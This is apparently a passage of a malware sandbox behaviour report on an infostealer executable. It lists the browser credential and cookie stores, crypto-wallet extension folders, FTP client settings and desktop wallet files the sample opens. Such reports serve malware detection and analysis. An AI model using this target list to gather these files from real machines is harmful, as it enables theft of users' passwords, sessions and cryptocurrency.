              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
